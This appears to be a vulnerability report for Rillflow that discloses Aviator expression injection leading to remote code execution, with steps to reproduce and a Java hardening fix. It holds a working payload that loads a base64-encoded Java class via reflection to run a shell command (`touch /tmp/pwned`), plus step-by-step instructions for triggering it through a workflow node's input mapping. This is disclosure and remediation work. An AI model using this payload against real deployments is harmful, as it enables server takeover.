
【bug report】Aviator Expression Injection Leading to RCE #102

@Startr4ck

Description


Summary

In the Rillflow management console, attackers can create a process list and set input mappings for nodes to process Aviator expressions, which can lead to Remote Code Execution (RCE). This allows them to escalate from a web user to gain machine privileges.

JDK17 Rillflow payload

use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('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'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));

Impact

Rillflow *

Proof of Concept

1. Create a process list, click Create

2. Import the demo file

```yaml
version: 1.0.0
workspace: rillFlowSimple
dagName: greet
alias: release
type: flow
inputSchema: >-
  [{"required":true,"name":"Bob","type":"String"},{"required":true,"name":"Alice","type":"String"}]
tasks:
  - category: function
    name: Bob
    resourceName: http://sample-executor:8000/greet.json?user=Bob
    pattern: task_sync
    tolerance: false
    next: Alice
    inputMappings:
      - source: "$.context.Bob"
        target: "$.input.Bob"
  - category: function
    name: Alice
    resourceName: http://sample-executor:8000/greet.json?user=Alice
    pattern: task_sync
    tolerance: false
    inputMappings:
      - source: "$.context.Alice"
        target: "$.input.Alice"
```

3. Click the Bob input and enter the payload:
use org.springframework.cglib.core.*;use org.springframework.util.*;use java.security.*;ReflectUtils.defineClass('org.springframework.expression.Test', Base64Utils.decodeFromString('yv66vgAAADQALAoACgAUCQAVABYIABcKABgAGQoAGgAbCAAcCgAaAB0HAB4HAB8HACABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAeAQAKU291cmNlRmlsZQEACVRlc3QuamF2YQwACwAMBwAhDAAiACMBAAtzdGF0aWMgRXhlYwcAJAwAJQAmBwAnDAAoACkBABB0b3VjaCAvdG1wL3B3bmVkDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAjb3JnL3NwcmluZ2ZyYW1ld29yay9leHByZXNzaW9uL1Rlc3QBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAkACgAAAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAQABAAFAAgADwAMAAEADQAAAFMAAgABAAAAFrIAAhIDtgAEuAAFEga2AAdXpwAES7EAAQAAABEAFAAIAAIADgAAABYABQAAAAkACAAKABEADAAUAAsAFQAOABAAAAAHAAJUBwARAAABABIAAAACABM'), ClassLoader.getSystemClassLoader(), nil, Class.forName('org.springframework.expression.ExpressionParser'));

Then the victim will execute `touch /tmp/pwned`.

Then click OK.

4. Click Save, then set the alias name

5. Click Next Step, click Submit

6. Click Test Run, input some args, execute the command

How to Fix It

When using Aviator, add the relevant configuration to it to prohibit the loading of external classes.
https://www.yuque.com/boyan-avfmj/aviatorscript/yr1oau
Simply set the class whitelist to empty.
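The following is an added example (not Rillflow's own code) of what that configuration looks like in Java using the public AviatorScript API: a dedicated evaluator instance whose class whitelist (`Options.ALLOWED_CLASS_SET` and `Options.ASSIGNABLE_ALLOWED_CLASS_SET`) is empty, so `use` imports, static method calls and class lookups from a script are rejected, plus a reduced `Options.FEATURE_SET` as defence in depth. The class name `HardenedAviator`, the method `evalMapping`, the sample environment and the assumption that input-mapping expressions only need plain value computation are mine, not the project's.

```java
// Added example (not Rillflow's own code): lock down an AviatorScript evaluator
// before handing it user-controlled input-mapping expressions.
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

import com.googlecode.aviator.AviatorEvaluator;
import com.googlecode.aviator.AviatorEvaluatorInstance;
import com.googlecode.aviator.Feature;
import com.googlecode.aviator.Options;

public class HardenedAviator {
    // One dedicated instance, so the global default evaluator's settings are not relied on.
    private static final AviatorEvaluatorInstance EVALUATOR = AviatorEvaluator.newInstance();

    static {
        // An empty whitelist means no Java class may be referenced from a script
        // (null would mean "allow everything"). This blocks `use` imports, static
        // calls and class lookups of any kind, not just the classes seen in the PoC.
        EVALUATOR.setOption(Options.ALLOWED_CLASS_SET, Collections.emptySet());
        EVALUATOR.setOption(Options.ASSIGNABLE_ALLOWED_CLASS_SET, Collections.emptySet());

        // Defence in depth (assumption: mapping expressions only compute plain values):
        // enable only the language features needed, which leaves out Use, NewInstance
        // and Module, so the script cannot reach into Java even if the whitelist is
        // changed later.
        EVALUATOR.setOption(Options.FEATURE_SET,
            Feature.asSet(Feature.Assignment, Feature.If, Feature.Lambda));
    }

    /** Evaluates an untrusted input-mapping expression against a value environment. */
    public static Object evalMapping(String expression, Map<String, Object> env) {
        return EVALUATOR.execute(expression, env);
    }

    public static void main(String[] args) {
        // Constructed sample environment standing in for a node's input mapping context.
        Map<String, Object> env = new HashMap<>();
        env.put("user", "Bob");
        System.out.println(evalMapping("'hello, ' + user", env)); // hello, Bob

        try {
            // Any class reference, even a harmless one, is now rejected before it runs.
            evalMapping("use java.util.*; HashMap.new()", env);
            System.out.println("NOT blocked: configuration is wrong");
        } catch (Exception e) {
            System.out.println("blocked: " + e.getClass().getSimpleName());
        }
    }
}
```

A practical check after applying this in the console: re-run the Test Run step from the proof of concept above and confirm the node fails with an Aviator exception instead of executing the command. The whitelist is the primary control; restricting the feature set only matters if the expression language needs nothing beyond arithmetic, string building and simple conditionals, which is the assumption made here.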
